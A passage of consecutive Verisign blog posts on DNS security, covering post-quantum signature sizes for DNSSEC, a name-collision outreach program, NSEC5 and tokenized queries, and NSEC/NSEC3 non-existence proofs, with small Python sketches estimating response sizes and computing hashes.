It will likely take several additional years for standards bodies such as the Internet Engineering Task Force (IETF) to incorporate the new algorithms into security protocols. Broad deployments of the upgraded protocols will likely take several years more.
Post-quantum algorithms can therefore be considered a long-term issue, not a near-term one. However, as with other long-term research, it’s appropriate to draw attention to factors that need to be taken into account well ahead of time.
The three candidate digital signature algorithms in NIST’s third round have one common characteristic: all of them have a key size or signature size (or both) that is much larger than for current algorithms.
Key and signature sizes are important operational considerations for DNSSEC because most of the DNS traffic exchanged with authoritative name servers is sent and received via the User Datagram Protocol (UDP), which has a limited response size.
Response size concerns were evident during the expansion of the root zone signing key (ZSK) from 1024-bit to 2048-bit RSA in 2016, and in the rollover of the root key signing key (KSK) in 2018. In the latter case, although the signature and key sizes didn’t change, total response size was still an issue because responses during the rollover sometimes carried as many as four keys rather than the usual two.
Thanks to careful design and implementation, response sizes during these transitions generally stayed within typical UDP limits. Equally important, response sizes also appeared to have stayed within the Maximum Transmission Unit (MTU) of most networks involved, thereby also avoiding the risk of packet fragmentation. (You can check how well your network handles various DNSSEC response sizes with this tool developed by Verisign Labs.)
The larger sizes associated with certain post-quantum algorithms do not appear to be a significant issue either for TLS, according to one benchmarking study, or for public-key infrastructures, according to another report. However, a recently published study of post-quantum algorithms and DNSSEC observes that “DNSSEC is particularly challenging to transition” to the new algorithms.
Verisign Labs offers the following observations about DNSSEC-related queries that may help researchers to model DNSSEC impact:
A typical resolver that implements both DNSSEC validation and qname minimization will send a combination of queries to Verisign’s root and top-level domain (TLD) servers.
Because the resolver is a validating resolver, these queries will all have the “DNSSEC OK” bit set, indicating that the resolver wants the DNSSEC signatures on the records.
The content of typical responses by Verisign’s root and TLD servers to these queries is given in Table 1 below. (In the table, <SLD>.<TLD> denotes the final two labels of a domain name of interest, including the TLD and the second-level domain (SLD); the record types involved include A, Name Server (NS) and DNSKEY.)
| Name Server | Resolver Query Scenario | Typical Response Content from Verisign’s Servers |
| --- | --- | --- |
| Root | DNSKEY record set for root zone | • DNSKEY record set including root KSK RSA-2048 public key and root ZSK RSA-2048 public key • Root KSK RSA-2048 signature on DNSKEY record set |
| Root | A or NS record set for <TLD> — when <TLD> exists | • NS referral to <TLD> name server • DS record set for <TLD> zone • Root ZSK RSA-2048 signature on DS record set |
| Root | A or NS record set for <TLD> — when <TLD> doesn’t exist | • Up to two NSEC records for non-existence of <TLD> • Root ZSK RSA-2048 signatures on NSEC records |
| .com / .net | DNSKEY record set for <TLD> zone | • DNSKEY record set including <TLD> KSK RSA-2048 public key and <TLD> ZSK RSA-1280 public key • <TLD> KSK RSA-2048 signature on DNSKEY record set |
| .com / .net | A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> exists | • NS referral to <SLD>.<TLD> name server • DS record set for <SLD>.<TLD> zone (if <SLD>.<TLD> supports DNSSEC) • <TLD> ZSK RSA-1280 signature on DS record set (if present) |
| .com / .net | A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> doesn’t exist | • Up to three NSEC3 records for non-existence of <SLD>.<TLD> • <TLD> ZSK RSA-1280 signatures on NSEC3 records |
For an A or NS query, the typical response, when the domain of interest exists, includes a referral to another name server. If the domain supports DNSSEC, the response also includes a set of Delegation Signer (DS) records providing the hashes of each of the referred zone’s KSKs — the next link in the DNSSEC trust chain. When the domain of interest doesn’t exist, the response includes one or more Next Secure (NSEC) or Next Secure 3 (NSEC3) records.
Researchers can estimate the effect of post-quantum algorithms on response size by replacing the sizes of the various RSA keys and signatures with those for their post-quantum counterparts. As discussed above, it is important to keep in mind that the number of keys returned may be larger during key rollovers.
Most of the queries from qname-minimizing, validating resolvers to the root and TLD name servers will be for A or NS records (the choice depends on the implementation of qname minimization, and has recently trended toward A). The signature size for a post-quantum algorithm, which affects all DNSSEC-related responses, will therefore generally have a much larger impact on average response size than will the key size, which affects only the DNSKEY responses.
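As a starting point for such modeling, the sketch below estimates how a signed referral or non-existence response grows when an RSA signature is swapped for a hypothetical post-quantum signature. The base (unsigned) response sizes and the 4,000-byte post-quantum figure are placeholders rather than measurements or NIST parameters; only the structure of the calculation is intended to be meaningful.

```python
# Sizes in bytes. The RSA figures follow directly from the key lengths above;
# everything else is an illustrative placeholder to be replaced with real
# values from the relevant specifications and zone data.
RSA_2048_SIG = 2048 // 8    # 256 bytes
RSA_1280_SIG = 1280 // 8    # 160 bytes

def referral_response_size(unsigned_size: int, num_sigs: int, sig_size: int) -> int:
    """Estimate a signed referral/negative response: unsigned content plus RRSIGs."""
    return unsigned_size + num_sigs * sig_size

def dnskey_response_size(unsigned_size: int, num_keys: int, key_size: int,
                         num_sigs: int, sig_size: int) -> int:
    """Estimate a DNSKEY response: public keys plus the KSK signature(s) over them."""
    return unsigned_size + num_keys * key_size + num_sigs * sig_size

# Today: a .com/.net referral with a DS record set carries one ZSK signature.
print(referral_response_size(unsigned_size=400, num_sigs=1, sig_size=RSA_1280_SIG))

# Hypothetical post-quantum algorithm with a 4,000-byte signature (placeholder):
print(referral_response_size(unsigned_size=400, num_sigs=1, sig_size=4000))

# NSEC3 non-existence responses carry up to three signatures (see Table 1),
# so signature size has roughly triple the impact there.
print(referral_response_size(unsigned_size=600, num_sigs=3, sig_size=4000))
```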
Post-quantum algorithms are among the newest developments in cryptography. They add another dimension to a cryptographer’s perspective on the DNS because of the possibility that these algorithms, or other variants, may be added to DNSSEC in the long term.
In my next post, I’ll make the case for why the oldest post-quantum algorithm, hash-based signatures, could be a particularly good match for DNSSEC. I’ll also share the results of some research at Verisign Labs into how the large signature sizes of hash-based signatures could potentially be overcome.
The post Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon appeared first on Verisign Blog.
A name collision occurs when a user attempts to resolve a domain in one namespace, but it unexpectedly resolves in a different namespace. Name collision issues in the public global Domain Name System (DNS) cause billions of unnecessary and potentially unsafe DNS queries every day. A targeted outreach program that Verisign started in March 2020 has remediated one billion queries per day to the A and J root name servers, via 46 collision strings. After contacting several national internet service providers (ISPs), the outreach effort grew to include large search engines, social media companies, networking equipment manufacturers, national CERTs, security trust groups, commercial DNS providers, and financial institutions.
While this unilateral outreach effort resulted in significant and successful name collision remediation, it is broader DNS community engagement, education, and participation that offers the potential to address many of the remaining name collision problems. Verisign hopes its successes will encourage participation by other organizations in similar positions in the DNS community.
Verisign is proud to be the operator of two of the world’s 13 authoritative root servers. Being a root server operator carries many operational responsibilities. Ensuring the security, stability and resiliency of the DNS requires proactive efforts to keep attacks against the root name servers from disrupting DNS resolution. It also requires monitoring DNS resolution patterns for misconfigurations, signaling telemetry, and unexpected or unintended uses that, without closer collaboration, could have unforeseen consequences (e.g., Chromium’s impact on root DNS traffic).
Monitoring may require various forms of responsible disclosure or notification to the underlying parties. Further, monitoring the root server system poses logistical challenges because any outreach and remediation programs must work at internet scale, and because root operators have no direct relationship with many of the involved entities.
Despite these challenges, Verisign has conducted several successful internet-scale outreach efforts to address various issues we have observed in the DNS.
In response to the Internet Corporation for Assigned Names and Numbers (ICANN) proposal to mitigate name collision risks in 2013, Verisign conducted a focused study on the collision string .CBA. Our measurement study revealed evidence of a substantial internet-connected infrastructure in Japan that relied on the non-resolution of names ending in .CBA. Verisign informed the network operator, which subsequently reconfigured some of its internal systems, resulting in an immediate decline in queries for .CBA observed at the A and J root servers.
Prior to the 2018 KSK rollover, several operators of DNSSEC-validating name servers appeared to be sending out-of-date RFC 8145 signals to root name servers. To ensure the KSK rollover did not disrupt internet name resolution for billions of end users, Verisign augmented ICANN’s outreach effort with a multi-faceted technical outreach program of its own: contacting and working with the United States Computer Emergency Readiness Team (US-CERT) and other national CERTs, industry partners and various DNS operator groups, and performing direct outreach to out-of-date signalers. The ultimate success of the KSK rollover was due in large part to the outreach efforts of ICANN and Verisign.
In resolutions 2017.11.02.29 through 2017.11.02.31, the ICANN Board asked the ICANN Security and Stability Advisory Committee (SSAC) to conduct studies and to present data and points of view on collision strings, including specific advice on three higher-risk strings: .CORP, .HOME and .MAIL. While Verisign is actively engaged in the resulting Name Collision Analysis Project (NCAP) developed by SSAC, we are also reviving and expanding our 2012 name collision outreach efforts.
Verisign’s name collision outreach program is based on the guidance we provided in several recent peer-reviewed name collision publications, which highlighted various name collision vulnerabilities, examined the root causes of leaked queries and made remediation recommendations. The program uses A and J root name server traffic data to identify high-affinity strings related to particular networks, as well as high query volume strings that are contextually associated with device manufacturers, software or platforms. We then attempt to contact the underlying parties and assist with remediation as appropriate.
While we partially rely on direct communication channel contact information, the key enabler of our outreach efforts has been Verisign’s relationships with the broader collective DNS community. Verisign’s active participation in various industry organizations within the ICANN and DNS communities, such as M3AAWG, FIRST, DNS-OARC, APWG, NANOG, RIPE NCC, APNIC, and IETF1, enables us to identify and communicate with a broad and diverse set of constituents. In many cases, participants operate infrastructure involved in name collisions. In others, they are able to put us in direct contact with the appropriate parties.
Through a combination of DNS traffic analysis and publicly accessible data, as well as the rolodexes of various industry partnerships, across 2020 we were able to achieve effective outreach to the anonymized entities listed in Table 1.
| Organization | Queries per Day to A & J | Status | Number of Collision Strings (TLDs) | Notes / Root Cause Analysis |
| --- | --- | --- | --- | --- |
| Search Engine | 650M | Fixed | 1 string | Application not using FQDNs |
| Telecommunications Provider | 250M | Fixed | N/A | Prefetching bug |
| eCommerce Provider | 150M | Fixed | 25 strings | Application not using FQDNs |
| Networking Manufacturer | 70M | Pending | 3 strings | Suffix search list |
| Cloud Provider | 64M | Fixed | 15 strings | Suffix search list |
| Telecommunications Provider | 60M | Fixed | 2 strings | Remediated through device vendor |
| Networking Manufacturer | 45M | Pending | 2 strings | Suffix search list problem in router/modem device |
| Financial Corporation | 35M | Fixed | 2 strings | Typo / misconfiguration |
| Social Media Company | 30M | Pending | 9 strings | Application not using FQDNs |
| ISP | 20M | Fixed | 1 string | Suffix search list problem in router/modem device |
| Software Provider | 20M | Pending | 50+ strings | Acknowledged but still investigating |
| ISP | 5M | Pending | 1 string | At time of writing, still investigating but confirmed it is a router/modem device |
Many of the name collision problems encountered are the result of misconfigurations and of software not using fully qualified domain names. After operators deploy patches to their environments, as shown in Figure 1 below, Verisign often observes an immediate and dramatic traffic decrease at the A and J root name servers. Although several networking equipment vendors and ISPs have acknowledged their name collision problems, the development and deployment of firmware updates to a large user base will take time.
Cumulatively, the operators who have deployed patches constitute a reduction of one billion queries per day to A and J root servers (roughly 3% of total traffic). Although root traffic is not evenly distributed among the 13 authoritative servers, we expect a similar impact at the other 11, resulting in a system-wide reduction of approximately 6.5 billion queries per day.
As the ICANN community prepares for Subsequent Procedures (the introduction of additional new TLDs) and the SSAC NCAP continues to work to answer the ICANN Board’s questions, we encourage the community to participate in our efforts to address name collisions through active outreach efforts. We believe our efforts show how outreach can have significant impact to both parties and the broader community. Verisign is committed to addressing name collision problems and will continue executing the outreach program to help minimize the attack surface exposed by name collisions and to be a responsible and hygienic root operator.
For additional information about name collisions and how to properly manage private-use TLDs, please visit ICANN’s Name Collision Resource & Information website.
1. The Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), Forum of Incident Response and Security Teams (FIRST), DNS Operations, Analysis, and Research Center (DNS-OARC), Anti-Phishing Working Group (APWG), North American Network Operators’ Group (NANOG), Réseaux IP Européens Network Coordination Centre (RIPE NCC), Asia Pacific Network Information Centre (APNIC), Internet Engineering Task Force (IETF)
The post Verisign Outreach Program Remediates Billions of Name Collision Queries appeared first on Verisign Blog.
This is the third in a multi-part blog series on cryptography and the Domain Name System (DNS).
In my last post, I looked at what happens when a DNS query results in a “negative” response – i.e., when a domain name doesn’t exist. I then examined two cryptographic approaches to handling negative responses: NSEC and NSEC3. In this post, I will examine a third approach, NSEC5, and a related concept that protects client information, tokenized queries.
The concepts I discuss below are topics we’ve studied in our long-term research program as we evaluate new technologies. They do not necessarily represent Verisign’s plans or position on a new product or service. Concepts developed in our research program may be subject to U.S. and international patents and patent applications.
NSEC5 is a result of research by cryptographers at Boston University and the Weizmann Institute. In this approach, which is still in an experimental stage, the endpoints are the outputs of a verifiable random function (VRF), a cryptographic primitive that has been gaining interest in recent years. NSEC5 is documented in an Internet Draft (currently expired) and in several research papers.
A VRF is like a hash function but with two important differences: first, the VRF can only be computed by the holder of a private key; and second, each output comes with a proof that lets anyone holding the corresponding public key verify that the output is correct.
So, it’s not only hard for an adversary to reverse the VRF – which is also a property the hash function has – but it’s also hard for the adversary to compute the VRF in the forward direction, thus preventing dictionary attacks. And yet a relying party can still confirm that the VRF output for a given input is correct, because of the proof.
How does this work in practice? As in NSEC and NSEC3, range statements are prepared in advance and signed with the zone signing key (ZSK). With NSEC5, however, the range endpoints are two consecutive tokens.
When a domain name doesn’t exist, the name server applies the VRF to the domain name to obtain a token and a proof. The name server then returns a range statement where the token falls within the range, as well as the proof, as shown in the figure below. Note that the token values are for illustration only.
Because the range statement reveals only tokenized versions of other domain names in a zone, an adversary who doesn’t know the private key doesn’t learn any new existing domain names from the response. Indeed, to find out which domain name corresponds to one of the tokenized endpoints, the adversary would need access to the VRF itself to see if a candidate domain name has a matching hash value, which would involve an online dictionary attack. This significantly reduces disclosure risk.
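The following sketch shows only the range-selection logic a name server would use, with an ordinary hash standing in for the VRF; it produces no proofs and is not an NSEC5 implementation. The zone names, token format and wrap-around handling are all hypothetical assumptions made for illustration.

```python
import hashlib
from bisect import bisect_right

def token(name: str) -> str:
    """Stand-in for the VRF output: an ordinary hash, used here only so the
    range-selection logic is concrete. A real VRF is keyed and yields a proof."""
    return hashlib.sha256(name.lower().encode()).hexdigest()[:8]

# Hypothetical zone contents; range statements over consecutive tokens would
# be signed in advance by the provisioning system.
existing_names = ["alpha.example", "bravo.example", "charlie.example"]
endpoints = sorted(token(n) for n in existing_names)

def covering_range(queried_name: str):
    """Select the precomputed range whose endpoints bracket the queried token."""
    t = token(queried_name)
    if t in endpoints:
        return None                           # the name exists; answer positively
    i = bisect_right(endpoints, t)
    start = endpoints[i - 1] if i > 0 else endpoints[-1]   # wrap around at the ends
    end = endpoints[i % len(endpoints)]
    return {"queried_token": t, "range": (start, end)}     # plus a proof, in real NSEC5

print(covering_range("nonexistent.example"))
```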
The name server needs a copy of the zone’s NSEC5 private key so that it can generate proofs for non-existent domain names. The ZSK itself can stay in the provisioning system. As the designers of NSEC5 have pointed out, if the NSEC5 private key does happen to be compromised, this only makes it possible to do a dictionary attack offline— not to generate signatures on new range statements, or on new positive responses.
NSEC5 is interesting from a cryptographer’s perspective because it uses a less common cryptographic technique, a VRF, to achieve a design goal that was at best partially met by previous approaches. As with other new technologies, DNS operators will need to consider whether NSEC5’s benefits are sufficient to justify its cost and complexity. Verisign doesn’t have any plans to implement NSEC5, as we consider NSEC and NSEC3 adequate for the name servers we currently operate. However, we will continue to track NSEC5 and related developments as part of our long-term research program.
A few years before NSEC5 was published, Verisign Labs had started some research on an opposite application of tokenization to the DNS, to protect a client’s information from disclosure.
In our approach, instead of asking the resolver “What is <name>’s IP address,” the client would ask “What is token 3141…’s IP address,” where 3141… is the tokenization of <name>.
(More precisely, the client would specify both the token and the parent zone that the token relates to, e.g., the TLD of the domain name. Only the portion of the domain name below the parent would be obscured, just as in NSEC5. I’ve omitted the zone information for simplicity in this discussion.)
Suppose now that the domain name corresponding to token 3141… does exist. Then the resolver would respond with the domain name’s IP address as usual, as shown in the next figure.
In this case, the resolver would know that the domain name associated with the token does exist, because it would have a mapping between the token and the DNS record, i.e., the IP address. Thus, the resolver would effectively “know” the domain name as well for practical purposes. (We’ve developed another approach that can protect both the domain name and the DNS record from disclosure to the resolver in this case, but that’s perhaps a topic for another post.)
Now, consider a domain name that doesn’t exist and suppose that its token is 2718… .
In this case, the resolver would respond that the domain name doesn’t exist, as usual, as shown below.
But because the domain name is tokenized and no other information about the domain name is returned, the resolver would only learn the token 2718… (and the parent zone), not the actual domain name that the client is interested in.
The resolver could potentially know that the name doesn’t exist via a range statement from the parent zone, as in NSEC5.
How does the client tokenize the domain name, if it doesn’t have the private key for the VRF? The name server would offer a public interface to the tokenization function. This can be done in what cryptographers call an “oblivious” VRF protocol, where the name server doesn’t see the actual domain name during the protocol, yet the client still gets the token.
To keep the resolver itself from using this interface to do an online dictionary attack that matches candidate domain names with tokens, the name server could rate-limit access, or restrict it only to authorized requesters.
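A toy sketch of the resolver side of this idea appears below. The tokenization function is again a plain hash stand-in (in the approach described above, the client would obtain tokens through an oblivious protocol without revealing the name), and the zone contents, addresses and token length are hypothetical.

```python
import hashlib

def tokenize(name: str, parent_zone: str) -> str:
    """Stand-in for the tokenization interface. In the approach described
    above, the client obtains this value via an oblivious VRF protocol, so
    the tokenizing party never sees the queried name."""
    return hashlib.sha256(f"{parent_zone}|{name.lower()}".encode()).hexdigest()[:8]

# The resolver's view: a mapping from tokens (not names) to DNS records.
# Hypothetical zone contents and addresses.
token_to_record = {
    tokenize("www.example", "com"): "192.0.2.10",
    tokenize("mail.example", "com"): "192.0.2.20",
}

def resolve_token(tok: str):
    """Answer a tokenized query; the resolver learns only the token."""
    return token_to_record.get(tok)   # None plays the role of "doesn't exist"

client_token = tokenize("www.example", "com")          # computed on the client side
print(resolve_token(client_token))                      # "192.0.2.10"
print(resolve_token(tokenize("nonexistent.example", "com")))   # None
```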
Additional details on this technology may be found in U.S. Patent 9,202,079B2, entitled “Privacy preserving data querying,” and related patents.
It’s interesting from a cryptographer’s perspective that there’s a way for a client to find out whether a DNS record exists without necessarily revealing the domain name of interest. However, as before, the benefits of this new technology must be weighed against its operational cost and complexity and compared to other approaches. Because this technique focuses on client-to-resolver interactions, it’s already one step removed from the name servers that Verisign currently operates, so it is not as relevant to our business today as it might have been when we started the research. This one will stay under our long-term tracking as well.
The examples I’ve shared in these last two blog posts make it clear that cryptography has the potential to bring interesting new capabilities to the DNS. While the particular examples I’ve shared here do not meet the criteria for our product roadmap, researching advances in cryptography and other techniques remains important because new events can sometimes change the calculus. That point will become even more evident in my next post, where I’ll consider the kinds of cryptography that may be needed in the event that one or more of today’s algorithms is compromised, possibly through the introduction of a quantum computer.
The post Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries appeared first on Verisign Blog.
This is the second in a multi-part blog series on cryptography and the Domain Name System (DNS).
In my previous post, I described the first broad scale deployment of cryptography in the DNS, known as the Domain Name System Security Extensions (DNSSEC). I described how a name server can enable a requester to validate the correctness of a “positive” response to a query — when a queried domain name exists — by adding a digital signature to the DNS response returned.
The designers of DNSSEC, as well as academic researchers, have separately considered the case of “negative” responses – when the domain name doesn’t exist. In this case, as I’ll explain, simply responding with a signed “does not exist” is not the best design. This makes the non-existence case interesting from a cryptographer’s perspective as well.
Consider a domain name like example.arpa that doesn’t exist.
If it did exist, then as I described in my previous post, the second-level domain (SLD) server for example.arpa would return a response signed by example.arpa’s zone signing key (ZSK).
So a first try for the case that the domain name doesn’t exist is for the SLD server to return the response “example.arpa doesn’t exist,” signed by example.arpa’s ZSK.
However, if example.arpa doesn’t exist, then example.arpa won’t have either an SLD server or a ZSK to sign with. So, this approach won’t work.
A second try is for the parent name server — the .arpa top-level domain (TLD) server in the example — to return the response “example.arpa doesn’t exist,” signed by the parent’s ZSK.
This could work if the .arpa DNS server knows the ZSK for .arpa. However, for security and performance reasons, the design preference for DNSSEC has been to keep private keys offline, within the zone’s provisioning system.
The provisioning system can precompute statements about domain names that do exist — but not about every possible individual domain name that doesn’t exist. So, this won’t work either, at least not for the servers that keep their private keys offline.
The third try is the design that DNSSEC settled on. The parent name server returns a “range statement,” previously signed with the ZSK, that states that there are no domain names in an ordered sequence between two “endpoints” where the endpoints depend on domain names that do exist. The range statements can therefore be signed offline, and yet the name server can still choose an appropriate signed response to return, based on the (non-existent) domain name in the query.
The DNS community has considered several approaches to constructing range statements, and they have varying cryptographic properties. Below I’ve described two such approaches. For simplicity, I’ve focused just on the basics in the discussion that follows. The astute reader will recognize that there are many more details involved both in the specification and the implementation of these techniques.
The first approach, called NSEC, involved no additional cryptography beyond the DNSSEC signature on the range statement. In NSEC, the endpoints are actual domain names that exist. NSEC stands for “Next Secure,” referring to the fact that the second endpoint in the range is the “next” existing domain name following the first endpoint.
The NSEC resource record is documented in RFC 4034, one of the original DNSSEC specifications, which was co-authored by Verisign.
The .arpa zone implements NSEC. When the .arpa server receives the request “What is the IP address of example.arpa,” it returns the response “There are no names between e164.arpa and home.arpa.” This exchange is shown in the figure below and is analyzed in the associated DNSviz graph. (The response is accurate as of the writing of this post; it could be different in the future if names were added to or removed from the .arpa zone.)
NSEC has a side effect: responses immediately reveal unqueried domain names in the zone. Depending on the sensitivity of the zone, this may be undesirable from the perspective of the minimum disclosure principle.
A second approach, called NSEC3, reduces the disclosure risk somewhat by defining the endpoints as hashes of existing domain names. (NSEC3 is documented in RFC 5155, which was also co-authored by Verisign.)
An example of NSEC3 can be seen with example.name, another domain that doesn’t exist. Here, the .name TLD server returns a range statement that “There are no domain names with hashes between 5SU9… and 5T48…”. Because the hash of example.name is “5SVV…” the response implies that “example.name” doesn’t exist.
This statement is shown in the figure below and in another DNSviz graph. (As above, the actual response could change if the .name zone changes.)
To find out which domain name corresponds to one of the hashed endpoints, an adversary would have to do a trial-and-error or “dictionary” attack across multiple guesses of domain names, to see if any has a matching hash value. Such a search could be performed “offline,” i.e., without further interaction with the name server, which is why the disclosure risk is only somewhat reduced.
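For readers who want to see the mechanics, below is a simplified sketch of the RFC 5155 hash computation and the range check a validating resolver performs. The salt and iteration count are hypothetical (each zone publishes its own in its NSEC3PARAM record), so the output will not match the .name values quoted above.

```python
import base64
import hashlib

# RFC 4648 base32 -> base32hex alphabet translation (NSEC3 uses base32hex).
_B32_TO_B32HEX = str.maketrans("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
                               "0123456789ABCDEFGHIJKLMNOPQRSTUV")

def wire_format(name: str) -> bytes:
    """Encode a domain name as length-prefixed labels (DNS wire format)."""
    out = b""
    for label in name.rstrip(".").lower().split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"

def nsec3_hash(name: str, salt_hex: str, iterations: int) -> str:
    """Iterated, salted SHA-1 of the wire-format name, Base32hex-encoded, as in
    RFC 5155. Simplified sketch; canonicalization and error handling omitted."""
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.sha1(wire_format(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return base64.b32encode(digest).decode().translate(_B32_TO_B32HEX)

def covered(hashed_name: str, range_start: str, range_end: str) -> bool:
    """True if the hashed name falls between the NSEC3 record's endpoints."""
    return range_start < hashed_name < range_end

# Hypothetical parameters; a real zone's salt and iteration count come from its
# NSEC3PARAM record, and the endpoints come from the NSEC3 record returned.
h = nsec3_hash("example.name", salt_hex="", iterations=0)
print(h)   # with the .name zone's real parameters, this would be the "5SVV..." value
# A validating resolver then evaluates covered(h, start, end) against the
# endpoints of the NSEC3 record it received to confirm non-existence.
```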
NSEC and NSEC3 are mutually exclusive. Nearly all TLDs, including all TLDs operated by Verisign, implement NSEC3. In addition to .arpa, the root zone also implements NSEC.
In my next post, I’ll describe NSEC5, an approach still in the experimental stage, that replaces the hash function in NSEC3 with a verifiable random function (VRF) to protect against offline dictionary attacks. I’ll also share some research Verisign Labs has done on a complementary approach that helps protect a client’s queries for non-existent domain names from disclosure.
The post Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3 appeared first on Verisign Blog.